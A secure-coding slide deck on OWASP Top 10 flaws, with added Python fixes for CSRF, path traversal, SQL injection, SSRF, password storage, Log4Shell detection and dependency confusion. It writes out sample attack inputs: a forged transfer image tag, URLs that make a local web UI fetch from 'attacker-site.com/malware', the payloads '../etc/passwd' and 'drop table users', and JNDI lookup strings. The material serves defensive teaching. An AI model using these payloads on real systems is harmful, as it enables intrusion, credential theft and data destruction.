Secure Coding

The document discusses various software vulnerabilities and security issues that can allow hacking or exploitation of systems and applications. It covers topics like broken access control, injection flaws, insecure design choices, use of outdated or vulnerable components, cryptographic failures, hard-coded credentials, and specific vulnerabilities like Log4j, Heartbleed, Spectre, and Meltdown. The document emphasizes that while some vulnerabilities are outside a developer's control, application security is generally a shared responsibility between developers and security experts, and even applications without sensitive data should still consider security.

Uploaded by

Mohsen Ashrafi
Copyright © All Rights Reserved

How do we write a program that gets hacked?

Saleh Khazaei
From whom did you learn not to get hacked? From hackers!
OWASP Top 10
Broken Access Control

OWASP's 2021 data: 94% of applications were tested for some form of broken access control.
A state-changing GET hidden in an image tag (CSRF): the victim's browser fetches it with the victim's cookies attached.
<img src="http://example.com/transfer/1234/1000000" width="0" height="0" border="0">

The same trick against a web UI listening on localhost: plain GET requests add a download and change the UI password.

http://localhost:8080/gui/?action=add-url&s=http://attacker-site.com/malware

http://localhost:8080/gui/?action=setsetting&s=webui.password&v=newpassword
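The two failures behind the slides above are a state change on a GET with no CSRF token, and an account id taken from the URL without checking who owns it. The following is an added example (not code from the deck); the accounts, sessions and the `/transfer/<account>/<amount>` route are constructed for illustration. The vulnerable handler accepts the forged image request; the hardened one requires a POST, a session-bound CSRF token compared in constant time, and an object-level ownership check.

```python
import hmac
import secrets

# Constructed in-memory state for the example (assumption: not a real system).
ACCOUNTS = {
    "1234": {"owner": "alice", "balance": 2_000_000},
    "5678": {"owner": "bob", "balance": 50},
}
SESSIONS = {
    "sess-alice": {"user": "alice", "csrf": secrets.token_hex(16)},
    "sess-bob": {"user": "bob", "csrf": secrets.token_hex(16)},
}


class Forbidden(Exception):
    pass


def parse_transfer_path(path):
    # /transfer/<account_id>/<amount>  (hypothetical route)
    _, account_id, amount = path.strip("/").split("/")
    return account_id, int(amount)


def transfer_vulnerable(method, path, session_id):
    """The handler the <img src=".../transfer/1234/1000000"> trick relies on:
    a state-changing GET, no CSRF token, and the account id used straight from
    the URL. The victim's browser attaches the cookie, so the session is valid."""
    if session_id not in SESSIONS:
        raise Forbidden("not logged in")
    account_id, amount = parse_transfer_path(path)
    ACCOUNTS[account_id]["balance"] -= amount
    return "ok"


def transfer_hardened(method, path, session_id, csrf_token):
    """Same request, three checks: POST only, a CSRF token bound to the session,
    and object-level authorisation on the account id."""
    if method != "POST":
        raise Forbidden("state change must be a POST")
    session = SESSIONS.get(session_id)
    if session is None:
        raise Forbidden("not logged in")
    # Constant-time compare; the token comes from the form body or a header,
    # never from a cookie (a cookie would be sent by the forged request too).
    if not hmac.compare_digest(session["csrf"], csrf_token or ""):
        raise Forbidden("bad CSRF token")
    account_id, amount = parse_transfer_path(path)
    account = ACCOUNTS.get(account_id)
    # The id came from the URL: verify the logged-in user actually owns it.
    if account is None or account["owner"] != session["user"]:
        raise Forbidden("not your account")
    if amount <= 0 or amount > account["balance"]:
        raise Forbidden("bad amount")
    account["balance"] -= amount
    return "ok"


def denied(fn, *args):
    """True when the handler rejects the request."""
    try:
        fn(*args)
    except Forbidden:
        return True
    return False
```

SameSite=Lax cookies (the modern browser default) already stop the image-tag case, because a subresource GET does not carry them, but they do not cover every cross-site request; the token and the ownership check are still needed.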

Filename=../../../../../../etc/passwd   (path traversal)
Brute force!
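For the `Filename=../../../../../../etc/passwd` case, the robust check is to canonicalise the full path and then test that it is still inside the allowed directory; searching the string for `..` misses absolute paths and encodings that the framework decodes before the check. Added example, not from the deck; `/srv/app/uploads` is an assumed document root.

```python
from pathlib import Path

# Assumption: the only directory the download endpoint may serve from.
BASE_DIR = Path("/srv/app/uploads")


def safe_resolve(base, filename):
    """Return the canonical path for `filename` if it stays inside `base`,
    otherwise None. Canonicalise first ('..' components and, when the path
    exists, symlinks collapse here), then test containment."""
    base = Path(base).resolve()
    # An absolute `filename` replaces `base` in the join; relative_to catches that.
    candidate = (base / filename).resolve()
    try:
        candidate.relative_to(base)
    except ValueError:
        return None
    return candidate


def basename_only(filename):
    """Stricter option for an endpoint that never needs subdirectories:
    keep only the last path component and drop everything else."""
    name = Path(filename).name
    return name or None
```

Run the check on the decoded value the application actually uses, after URL decoding, and log rejected names: a burst of `../` attempts against one parameter is also the brute-force signal the next slide refers to.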
Injection

OWASP's 2021 data: 94% of applications were tested for some form of injection.

Name: '; drop table users; --

Query: select id from users where name = ''; drop table users; --'
- All of the databases (NoSQL, SQL), e.g. Elasticsearch, Cassandra, MySQL, PostgreSQL
- OS Command
- LDAP
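The slide's payload, run end to end. This is an added example (not the deck's code) using Python's sqlite3 on an in-memory database; `executescript()` stands in for a driver that allows stacked statements (MySQL with multi-statements enabled, psycopg2), since sqlite3's plain `execute()` refuses a second statement. The hardened version passes the name as a bound parameter, so the quote and the semicolon are data, not SQL.

```python
import sqlite3


def make_db():
    """Constructed sample database: two users."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO users(name) VALUES ('alice'), ('bob');
    """)
    return conn


def table_exists(conn, table):
    row = conn.execute(
        "select 1 from sqlite_master where type='table' and name=?", (table,)
    ).fetchone()
    return row is not None


def find_user_vulnerable(conn, name):
    """String concatenation: the input closes the quote, ends the statement
    with ';' and comments out the trailing quote with '--'. Returns the query
    actually sent so the caller can see what the database received."""
    query = "select id from users where name = '" + name + "'"
    conn.executescript(query)
    return query


def find_user_safe(conn, name):
    """Parameterised query: the driver sends the value separately from the
    statement, so the same payload is just an odd-looking name."""
    rows = conn.execute("select id from users where name = ?", (name,)).fetchall()
    return [r[0] for r in rows]
```

The same rule applies to the other targets the slide lists: for OS commands pass an argument list rather than a shell string, and for LDAP escape the filter characters with the client library's own escaping function.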
Insecure Design
• Table users:
• ID
• Username
• Password
Insecure Design
• Table users:
• ID
• Username
• Password -> hash(Password)

• Sensitive information: pick the weakest form that still does the job
• Only need a correctness or existence check (passwords, tokens) -> Hash
• Only need to view it -> Masking
• Really need the value back -> Encryption
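Two of the three options above in working form: hashing for the correctness check and masking for display. Added example, not from the deck. It uses the standard library's PBKDF2-HMAC-SHA256 with a random per-user salt and a self-describing storage format, so the cost can be raised later without a migration; the iteration count follows OWASP's current guidance for that algorithm. The encryption case is omitted because it needs a key-management story and a library such as `cryptography`, not just a function.

```python
import hashlib
import hmac
import os

# OWASP's current guidance for PBKDF2-HMAC-SHA256 is 600,000 iterations.
ITERATIONS = 600_000


def hash_password(password, salt=None):
    """Store this instead of the password: algorithm, cost, per-user salt and
    the derived key. A fresh salt means equal passwords give different rows."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Correctness check: recompute with the stored salt and cost, compare in
    constant time. The original password is never needed and never stored."""
    try:
        algo, iterations, salt_hex, dk_hex = stored.split("$")
        if algo != "pbkdf2_sha256":
            return False
        dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(iterations))
    except ValueError:          # malformed record: wrong field count or bad hex
        return False
    return hmac.compare_digest(dk.hex(), dk_hex)


def mask(value, visible=4, char="*"):
    """'View -> Masking': show a card or phone number with only the tail visible."""
    if len(value) <= visible:
        return char * len(value)
    return char * (len(value) - visible) + value[-visible:]
```

If a dedicated password-hashing library is available, prefer argon2id or bcrypt over PBKDF2; the storage format and the constant-time verify stay the same.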
Vulnerable and Outdated Components
Server-Side Request Forgery (SSRF)

file:///etc/passwd
http://localhost:8080
http://wontevercloseconnection.xyz
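The three URLs on the slide are the three SSRF shapes: a local file scheme, a service on the server's own loopback, and a host that never closes the connection. The following added example (not from the deck; `api.example.com` is an assumed allow-listed upstream) rejects all three before any request is made: scheme and host allow-listing, a block on IP literals in loopback, private and link-local ranges (including the 169.254.169.254 cloud metadata address), refusal of redirects so a 302 cannot re-point the request at localhost, and a timeout plus size cap on the fetch itself.

```python
import ipaddress
import urllib.request
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
# Assumption: the only upstream this feature legitimately needs to reach.
ALLOWED_HOSTS = {"api.example.com"}


def check_outbound_url(url, allowed_hosts=ALLOWED_HOSTS):
    """Allow-list scheme and host before a server-side fetch. Returns (ok, reason)."""
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {scheme!r} not allowed"          # file://, gopher://, ...
    host = parts.hostname
    if not host:
        return False, "no host"
    if parts.username or parts.password:
        return False, "credentials in URL"                      # http://api.example.com@evil/
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None
    if ip is not None:
        # Loopback, RFC 1918, link-local (169.254.169.254 metadata), etc.
        if (ip.is_loopback or ip.is_private or ip.is_link_local
                or ip.is_reserved or ip.is_multicast or ip.is_unspecified):
            return False, f"{ip} is an internal address"
        return False, "IP literals not allowed; use an allow-listed host name"
    if host.lower() not in allowed_hosts:
        return False, f"host {host!r} not on the allow-list"
    return True, "ok"


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    # A 302 to http://localhost would bypass the check above; returning None
    # makes urllib raise the HTTPError instead of following the redirect.
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def fetch_limited(url, timeout=5.0, max_bytes=1_000_000):
    """Fetch only after the check passes, with a connect/read timeout (the
    never-closing host) and a cap on how much of the body is read."""
    ok, reason = check_outbound_url(url)
    if not ok:
        raise ValueError(reason)
    opener = urllib.request.build_opener(_NoRedirect)
    with opener.open(url, timeout=timeout) as resp:
        return resp.read(max_bytes)
```

A name on the allow-list can still resolve to an internal address if the attacker controls its DNS (rebinding); where that matters, resolve once, check the resulting IP with the same ranges, and connect to that IP.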
Cryptographic Failures
Hard-coded credentials
The biggest blunders of programmers ☺
Mirai Botnet
• ARC processor
• Default username & password
• baby monitors, vehicles, network routers, agricultural devices, medical devices, environmental monitoring devices, home appliances, DVRs, CCTV cameras, headsets, smoke detectors
• About 100,000 bots in the attack on the DNS provider Dyn
Log4j Vulnerability
• Log.info("${user.username} not found")   <- attacker-controlled text lands in the log message
• Log4j evaluates ${...} lookups inside the message, including remote ones: LDAP, DNS, Java Remote Method Invocation (RMI)
• ${jndi:protocol://server}: the ${...} lookup syntax is what fires the request
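Real Log4Shell traffic rarely contains the literal string `${jndi:`; attackers hide it inside other lookups that Log4j resolves first, such as `${lower:j}` or the `${anything:-default}` fallback. The detection logic below is an added example (not from the deck): it emulates only the lookups whose result is attacker-chosen text (`lower`, `upper`, and the `:-` default), collapsing them from the inside out, and then checks whether a `jndi:` lookup is what remains. The hostnames in the test strings are constructed.

```python
import re

# Innermost ${...} with no nested lookup inside it.
INNER = re.compile(r"\$\{([^${}]*)\}")
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(body):
    """Emulate the lookups an attacker can use to build text. Returns None
    when the lookup is not one we evaluate (jndi, env, sys, date, ...)."""
    # ${lookup:arg:-default}: if the lookup cannot be evaluated, Log4j uses the default.
    if ":-" in body:
        head, default = body.split(":-", 1)
        resolved = _resolve(head)
        return resolved if resolved is not None else default
    name, sep, arg = body.partition(":")
    if sep and name.lower() == "lower":
        return arg.lower()
    if sep and name.lower() == "upper":
        return arg.upper()
    return None


def normalise(text, max_rounds=50):
    """Collapse nested obfuscation until nothing evaluable is left."""
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            value = _resolve(m.group(1))
            if value is None:
                return m.group(0)      # leave jndi:, env:, etc. in place
            changed = True
            return value

        text = INNER.sub(repl, text)
        if not changed:
            break
    return text


def is_log4shell(text):
    """True if, after de-obfuscation, the text contains a JNDI lookup."""
    return bool(JNDI.search(normalise(text)))
```

Note that for Log4j 2.x the usual "use parameterised logging" advice does not help: vulnerable versions applied lookups to the formatted message, so `log.info("user {} not found", name)` was exploitable too. The fix is upgrading Log4j (or removing the JndiLookup class); the scanner above is for spotting attempts in request logs, not a substitute for patching.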
Log4j attack
Heart Bleed
Dependency Confusion

Apple, Microsoft, Shopify, PayPal, Netflix, Yelp, Uber

• pip install library
• Checks whether library exists on the specified (internal) package index
• Also checks whether library exists on the public package index (PyPI), when the internal index is configured with --extra-index-url
• Installs whichever version is found. If the package exists on both, it defaults to installing from the source with the higher version number, so an attacker who publishes the internal name on PyPI with a high version number wins.
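The resolution rule above and the settings that make it dangerous, as an added example (not from the deck). `pip_picks` models the pooled "highest version wins" decision; `audit_requirements` reads a requirements file and flags an `--extra-index-url` line, a private package without an exact pin, and any requirement without a `--hash`. The `acme-` prefix, the internal index URL and the requirements text are constructed assumptions; the hashes are placeholders, not real digests.

```python
import re

# Assumption: the organisation's private packages all share this name prefix.
INTERNAL_PREFIXES = ("acme-",)

# Constructed requirements file: one weak setting, one unpinned private package.
SAMPLE_REQUIREMENTS = """\
--index-url https://pypi.internal.example/simple
--extra-index-url https://pypi.org/simple
acme-utils>=1.2
requests==2.31.0 --hash=sha256:{0}
acme_auth==3.0.1 --hash=sha256:{0}
""".format("0" * 64)

REQ_LINE = re.compile(
    r"^(?P<name>[A-Za-z0-9][A-Za-z0-9._-]*)\s*"
    r"(?P<op>===|==|~=|>=|<=|!=|>|<)?\s*(?P<ver>[^\s;]+)?(?P<rest>.*)$")


def vkey(version):
    # Simplified: dotted integers only (real resolvers use PEP 440 ordering).
    return tuple(int(p) for p in version.split("."))


def pip_picks(internal_versions, public_versions):
    """The rule the deck describes for --extra-index-url: candidates from both
    indexes are pooled and the highest version wins, wherever it lives.
    Returns (source, version) or None. Exact ties are not modelled."""
    pool = [(vkey(v), "internal", v) for v in internal_versions]
    pool += [(vkey(v), "public", v) for v in public_versions]
    if not pool:
        return None
    _, source, version = max(pool)
    return source, version


def audit_requirements(text):
    """Return (line number, message) findings for the settings that let an
    attacker-published public package replace a private one."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line.startswith("--extra-index-url"):
            findings.append((lineno, "extra-index-url: every name is also looked up on the public index"))
            continue
        if line.startswith("-"):
            continue                      # --index-url and other options
        m = REQ_LINE.match(line)
        if not m:
            findings.append((lineno, "unparsed requirement"))
            continue
        name = m.group("name").lower().replace("_", "-")
        if name.startswith(INTERNAL_PREFIXES) and m.group("op") != "==":
            findings.append((lineno, f"{name}: private package without an exact pin"))
        if "--hash=" not in m.group("rest"):
            findings.append((lineno, f"{name}: no --hash, so the downloaded artifact is not verified"))
    return findings
```

The usual fix is a single trusted index (`--index-url` only, with the internal proxy mirroring the public packages you need), exact pins with hashes, and registering your private names on PyPI so nobody else can.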
Spectre

Meltdown

This one was not the programmers' fault!


Spectre - Speculative execution
[diagram: CPU, cache and memory]

arr := [1]int{0}      // one element, so only index 0 is in bounds
x := 10000            // attacker-chosen, far out of bounds
if x < len(arr) {     // the branch predictor guesses "yes" and races ahead (mig mig ...)
    y := arr[x]       // out-of-bounds load; the line it touched is now in the CPU cache
    // oops! the CPU rolls this back once it notices, but not its effect on the cache
    // (in the real attack y then indexes a second array, so which line is hot encodes the secret byte)
}
Do a CPU cache side-channel attack and read the cache!
BOOM: memory the program was never allowed to read has leaked.
Whose responsibility is software security?
The developer or the security expert?

I am developing software that holds no important data; do I still need to spend time on its security?
